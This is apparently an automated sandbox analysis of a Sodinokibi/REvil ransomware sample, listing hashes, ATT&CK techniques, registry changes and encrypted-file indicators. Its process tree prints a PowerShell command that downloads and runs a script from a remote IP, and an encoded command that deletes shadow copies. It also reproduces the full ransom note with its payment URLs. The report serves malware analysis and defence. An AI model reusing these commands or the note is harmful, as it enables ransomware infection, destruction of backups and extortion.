sodinokibi | db2c20d79fbbbaf8f83bee3506d0a2dfa7bcb5fd1e69be9abcf7c0016f0679ed

General

Target

3defad0fc0a8b4e37a73ffc6d2ea8f2c.bat
Size

217B
MD5

2ab61d56f01d736001ccaac50b4175b3
SHA1

eb1e9c14e901a1dc760cf78c692a5ebc095b6bda
SHA256

db2c20d79fbbbaf8f83bee3506d0a2dfa7bcb5fd1e69be9abcf7c0016f0679ed
SHA512

81c624f718127b9f15c9f5fcc73b8e141263291061054393063974ba20c531574d9bbba856c2b63e0ac40a87067984b82dcd641eadffba3e6b804811bb9316cc

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/3defad0fc0a8b4e37a73ffc6d2ea8f2c

Extracted

Path

C:\9tn257c-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 9tn257c. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/861ABC9D5555F057 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/861ABC9D5555F057 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: AHDlnUkGii0AJhT9E3VYxWnnnsvlF1bPIWklzMZmi4xoxhCkD/tEw9xlu4pBvuzi uaqQQR9I8imRC5voiPfj0gd1xdn0AaGEETAWARqUlZW+law+8rBzHcDvxNnhDB4b VWC0ODs3zDqUzq/Ks2ax0N7B4iGL4zeK/TCXEOXAVgJ1dOqv+3w7+GU76on9g2Ek f1G61+yhG9HSsLz5AqupA0DM6uIB8ALDVAO3hs751l085dQU3WvB/QFIOJZ5/uV6 9v9PODFE6//6DNpcbNZxizZ+JJFiL0aBNcXIj342v1IC+wvIuVGDwq0qtspw5+rx P1UWfLnj8ihl5KRyS7JhhemvyiOiQgJnx//g4O2pGiqB89viS1rDm8qE65LbH12f kUSH/3tY890nWCZw62oAzJCDK+sMJKPc2v/ZMUlnHnHorX2Lu8/Y+OIfnQyP7ans LP+Evgf4gbaqhGftgZtauGA5m+tLRP+SrVtuhSfToKmhFWruztg6vuYlLJtOGYR/ EFyPYp5njELMIvLnn97Fe90wc3RFtnXumjprtrrwWREQIv18wrCVn1RAqlRXujMS mfBYU9svukfqm38KJ0rDvV1Tx7AtQg/Y4apvtyR+QdBBG3iTJt2zHLjanSbH7IwE qdl0mYsjxb3tRSOXzhEC0a03gPBXlEMrK9LBWGdRmBlTStsCrRHirRz9WV0HguR4 W0d/AurDvT66435TIUQj539DQ5UxRztANc74bK2dKxY6ddF+g1YlKqQacyTT59mY uHbZjGujQEeMxLw+dy8GfsdNzSCZ6eqhWXSLfGu+q9wUZ6Q+LH1680Uz7ffJyMRv wSKSeiQHDGD/4LHkvpP8A5QwG5eONA03T6FLn5D9VzIHGi8iA8ghCKjL4GyTFmV5 7jDFXFayXuNdgUemamT6NeBcZssN76A+vF+HeR/uJdnj4Un+T1LoNQCs4su/vHME B0jY26Y+KJY2aMbs3bH5462CDwXmNXo632q4EBilZcMEO9yF1ey6Q9aoZ4ULc9nu t+WowYpjPru1rFSiARLrIU0SXisu/HHd31QJZ4SAhAL55GFytbvShDDNz4Rg+hZE IJAxdA1/iTHXHvTfyplNrEcpkK4g7a7B9NDK5jI7OaRjd17yKfzuigUiuvsMRcai pQAqndWfq7qWH4l6qZ/It1Xf2H9RH3Ay2sLMzkf6f10Q74Dk/RZ+SRGRKISgUPRv d7iBBFUz5LmlLc4kLcD4LvAY6c4EWYx9xQlTeLqKAEicLPeXfP+rehtWvrCxNsCA 70lsxASzzJW4lyN53Cpo9s3vx7lFYD/CWm9zpTmHFUcJCw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/861ABC9D5555F057

http://decryptor.cc/861ABC9D5555F057

Signatures

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 280 wrote to memory of 868	280	cmd.exe	powershell.exe
PID 280 wrote to memory of 868	280	cmd.exe	powershell.exe
PID 280 wrote to memory of 868	280	cmd.exe	powershell.exe
PID 280 wrote to memory of 868	280	cmd.exe	powershell.exe
PID 868 wrote to memory of 1848	868	powershell.exe	powershell.exe
PID 868 wrote to memory of 1848	868	powershell.exe	powershell.exe
PID 868 wrote to memory of 1848	868	powershell.exe	powershell.exe
PID 868 wrote to memory of 1848	868	powershell.exe	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

868 powershell.exe

pid	process
868	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	1848	powershell.exe
Token: SeBackupPrivilege	1604	vssvc.exe
Token: SeRestorePrivilege	1604	vssvc.exe
Token: SeAuditPrivilege	1604	vssvc.exe
Token: SeTakeOwnershipPrivilege	868	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8144168.bmp"	powershell.exe

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

868 powershell.exe
868 powershell.exe
868 powershell.exe
1848 powershell.exe
1848 powershell.exe
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 868 powershell.exe

pid	process
868	powershell.exe
868	powershell.exe
868	powershell.exe
1848	powershell.exe
1848	powershell.exe

flow	pid	process
3	868	powershell.exe

Modifies extensions of user files 12 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\FindRead.crw => \??\c:\users\admin\pictures\FindRead.crw.9tn257c	powershell.exe
File renamed	C:\Users\Admin\Pictures\MoveUnprotect.png => \??\c:\users\admin\pictures\MoveUnprotect.png.9tn257c	powershell.exe
File renamed	C:\Users\Admin\Pictures\RemoveComplete.raw => \??\c:\users\admin\pictures\RemoveComplete.raw.9tn257c	powershell.exe
File renamed	C:\Users\Admin\Pictures\RequestUnprotect.tif => \??\c:\users\admin\pictures\RequestUnprotect.tif.9tn257c	powershell.exe
File renamed	C:\Users\Admin\Pictures\RevokeFormat.tif => \??\c:\users\admin\pictures\RevokeFormat.tif.9tn257c	powershell.exe
File renamed	C:\Users\Admin\Pictures\DenyEnable.png => \??\c:\users\admin\pictures\DenyEnable.png.9tn257c	powershell.exe
File renamed	C:\Users\Admin\Pictures\EnterAdd.tif => \??\c:\users\admin\pictures\EnterAdd.tif.9tn257c	powershell.exe
File renamed	C:\Users\Admin\Pictures\NewSkip.png => \??\c:\users\admin\pictures\NewSkip.png.9tn257c	powershell.exe
File renamed	C:\Users\Admin\Pictures\RemoveUnregister.tiff => \??\c:\users\admin\pictures\RemoveUnregister.tiff.9tn257c	powershell.exe
File renamed	C:\Users\Admin\Pictures\SyncSwitch.raw => \??\c:\users\admin\pictures\SyncSwitch.raw.9tn257c	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\RemoveUnregister.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\ExitUnlock.png => \??\c:\users\admin\pictures\ExitUnlock.png.9tn257c	powershell.exe

Drops file in Program Files directory 22 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\PingOpen.DVR	powershell.exe
File opened for modification	\??\c:\program files\RenameMount.ini	powershell.exe
File opened for modification	\??\c:\program files\SwitchSkip.wm	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\9tn257c-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\UndoGroup.xlsb	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\9tn257c-readme.txt	powershell.exe
File created	\??\c:\program files (x86)\9tn257c-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ConnectRead.svg	powershell.exe
File opened for modification	\??\c:\program files\DenyUnprotect.jpeg	powershell.exe
File opened for modification	\??\c:\program files\LimitUnlock.wma	powershell.exe
File opened for modification	\??\c:\program files\RestartLimit.txt	powershell.exe
File opened for modification	\??\c:\program files\TestResolve.3gp2	powershell.exe
File opened for modification	\??\c:\program files\BlockHide.rle	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\9tn257c-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\UnblockStep.wma	powershell.exe
File opened for modification	\??\c:\program files\UnlockApprove.rar	powershell.exe
File created	\??\c:\program files\9tn257c-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\AddMeasure.potx	powershell.exe
File opened for modification	\??\c:\program files\CloseImport.htm	powershell.exe
File opened for modification	\??\c:\program files\RenameClose.tiff	powershell.exe
File opened for modification	\??\c:\program files\SendRepair.xml	powershell.exe
File opened for modification	\??\c:\program files\UndoConvertTo.xltx	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\3defad0fc0a8b4e37a73ffc6d2ea8f2c.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:280

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/3defad0fc0a8b4e37a73ffc6d2ea8f2c');Invoke-PJWVUIZXTL;Start-Sleep -s 10000"
2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Modifies extensions of user files
- Drops file in Program Files directory
PID:868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1848

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1604

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1ab2c564-9698-406f-80da-b82bfb15ab48

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_38604b7f-3b56-4cdf-857e-df63e390b481

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a38e600-169e-4ec7-98bd-529788f42566

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_42778251-f07e-4ae1-bc57-a77894ebb1f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5c80f677-3c28-410d-966a-1d329145fa84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a700e20d-ef30-47d4-abf6-6f8f1430f64a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/868-5-0x00000000012D0000-0x00000000012D1000-memory.dmp

Filesize
4KB

Download
memory/868-21-0x0000000006250000-0x0000000006251000-memory.dmp

Filesize
4KB

Download
memory/868-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

Filesize
4KB

Download
memory/868-14-0x00000000057C0000-0x00000000057C1000-memory.dmp

Filesize
4KB

Download
memory/868-13-0x0000000005730000-0x0000000005731000-memory.dmp

Filesize
4KB

Download
memory/868-8-0x00000000056F0000-0x00000000056F1000-memory.dmp

Filesize
4KB

Download
memory/868-0-0x0000000000000000-mapping.dmp

Download
memory/868-4-0x0000000001050000-0x0000000001051000-memory.dmp

Filesize
4KB

Download
memory/868-3-0x00000000049F0000-0x00000000049F1000-memory.dmp

Filesize
4KB

Download
memory/868-2-0x0000000000F00000-0x0000000000F01000-memory.dmp

Filesize
4KB

Download
memory/868-1-0x0000000074810000-0x0000000074EFE000-memory.dmp

Filesize
6.9MB

Download
memory/1848-23-0x0000000000000000-mapping.dmp

Download
memory/1848-25-0x0000000074810000-0x0000000074EFE000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads